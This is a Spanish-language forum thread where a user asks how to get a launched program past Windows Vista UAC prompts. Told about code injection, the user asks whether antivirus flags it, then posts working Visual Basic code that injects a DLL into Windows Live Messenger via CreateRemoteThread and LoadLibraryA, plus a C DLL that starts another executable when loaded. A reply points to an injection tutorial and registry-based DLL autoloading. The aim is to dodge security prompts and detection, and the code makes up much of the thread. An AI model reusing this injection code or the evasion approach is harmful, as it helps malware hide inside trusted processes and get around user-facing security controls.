A ver me explico.... yo tengo un programa lanzador k se llama a.exe que lanza otro programa que se llama b.exe...

entonces vista avisa al usuario de que el programa a.exe qu¡ere aceder al equipo cuando es b.exe el que escribe en el registro....

es posible que un programa (a.exe) que lanza otro (b.exe) al ejecutarse (b.exe) pida permisos de usuario como b.exe y no como a.exe??

Asi se podra pasar mejor el uac de windows..... a ver si me dais alguna ides

asiasss

¡¡Muchas gracias!!! no sabia eso de inyectar el codigo :D ahora mismo me pongo a estudiarlo.

¿esto no sirve tambien para win 7???

Gracias estoy leyendo sobre el tema y en algunos sitios pone que casi todos los antivirus saltan cuando se inyecta codio ¿ es cierto esto? :S:S

Buffff he estado buscando informacion en este foro y ando algo liado.... un par de aclaraciones sorry....

Tengo que inyectar directamente el codigo en el proceso no?? es mejor que inyectar la dll...

Y en visual basic no se puede hacer no????? me da que tendre k ir aprendiendo ya c++


He conseguido inyectar una dll en visual basic pero no consigo crear una dll para que por ejemplo ejecute un archivo al cargarse¿es posible esto con VB???

Tecnicamente se puede inyectar exe con el metodo que esta con chincheta que hacker_0 hizo un tuto

Las Dll no pueden ser ejecutadas como un exe deben ser cargadas desde otro proceso total o parcialmente con LoadLibrary  o sino insertarlas en el registro para que windows las cargue con otras dll en el inicio  Te recominiendo el Maual de EON .



  Saludos ...

:S:S Ya he conseguido crear la dll pero me sigue pidiendo permisos en vista os dejo el code a ver si me podeis decir en que esta fallando la dll la carga bien porque el s.exe se ejecuta pero me sigue pidiendo permisos :S

code inyector (VB):

Private Const PAGE_READWRITE As Long = &H4
Private Const MEM_RELEASE As Long = &H8000
Private Const MEM_COMMIT As Long = &H1000
Private Const STANDARD_RIGHTS_REQUIRED As Long = &HF0000
Private Const SYNCHRONIZE As Long = &H100000
Private Const PROCESS_ALL_ACCESS As Long = (STANDARD_RIGHTS_REQUIRED Or SYNCHRONIZE Or &HFFF)
Private Const INFINITE As Long = &HFFFFFF

Private Declare Function OpenProcess Lib "kernel32" (ByVal dwDesiredAccess As Long, ByVal bInheritHandle As Long, ByVal dwProcessId As Long) As Long
Private Declare Function GetProcAddress Lib "kernel32" (ByVal hModule As Long, ByVal lpProcName As String) As Long
Private Declare Function GetModuleHandle Lib "kernel32" Alias "GetModuleHandleA" (ByVal lpModuleName As String) As Long
Private Declare Function VirtualAllocEx Lib "kernel32" (ByVal hProcess As Long, ByVal lpAddress As Long, ByVal dwSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As Long
Private Declare Function WriteProcessMemory Lib "kernel32" (ByVal hProcess As Long, lpBaseAddress As Any, lpBuffer As Any, ByVal nSize As Long, lpNumberOfBytesWritten As Long) As Long
Private Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As Long
Private Declare Function CreateRemoteThread Lib "kernel32" (ByVal hProcess As Long, lpThreadAttributes As Long, ByVal dwStackSize As Long, lpStartAddress As Long, lpParameter As Any, ByVal dwCreationFlags As Long, lpThreadId As Long) As Long
Private Declare Function WaitForSingleObject Lib "kernel32" (ByVal hHandle As Long, ByVal dwMilliseconds As Long) As Long


Public Function Inyecta(RutaDll As String, Pid As Long) As Integer
Dim proc As Long
Dim nload As Long
Dim rems As Long
Dim longi As Long
Dim RemThread As Long
Dim Tid As Long

On Error GoTo Error
proc = OpenProcess(PROCESS_ALL_ACCESS, False, Pid)
nload = GetProcAddress(GetModuleHandle("kernel32.dll"), "LoadLibraryA")
rems = VirtualAllocEx(proc, 0, Len(RutaDll), MEM_COMMIT, PAGE_READWRITE)
WriteProcessMemory proc, ByVal rems, ByVal RutaDll, Len(RutaDll), longi
CreateRemoteThread proc, ByVal 0, 0, ByVal nload, ByVal rems, 0, Tid
WaitForSingleObject rems, INFINITE
CloseHandle proc
CloseHandle rems
Inyecta = 0
Exit Function
Error:
Inyecta = 1
End Function


Private Sub Form_Load()
Dim ruta As Long
Dim resultado As Integer

ruta = Shell("C:\Archivos de programa\Windows Live\Messenger\msnmsgr.exe")
resultado = Inyecta("C:\proyecto1.dll", ruta)

End
End Sub

y esta es la dll en C:

#include "dll.h"
#include <windows.h>
#include <stdio.h>





 
 
BOOL APIENTRY DllMain (HINSTANCE hInst     /* Library instance handle. */ ,
                       DWORD reason        /* Reason this function is being called. */ ,
                       LPVOID reserved     /* Not used. */ )
{
 if(reason==DLL_PROCESS_ATTACH){
 
                              PROCESS_INFORMATION piProcInfo;
STARTUPINFO siStartInfo;


ZeroMemory( &piProcInfo, sizeof(PROCESS_INFORMATION) );

// Set up members of the STARTUPINFO structure.

ZeroMemory( &siStartInfo, sizeof(STARTUPINFO) );
siStartInfo.cb = sizeof(STARTUPINFO);

// Create the child process.

return CreateProcess(NULL,
"c:\\s.exe", // command line
NULL, // process security attributes
NULL, // primary thread security attributes
TRUE, // handles are inherited
0, // creation flags
NULL, // use parent's environment
NULL, // use parent's current directory
&siStartInfo, // STARTUPINFO pointer
&piProcInfo); // receives PROCESS_INFORMATION
                                }
 
    /* Returns TRUE on success, FALSE on failure */
    return TRUE;
}


Gracias!!!!!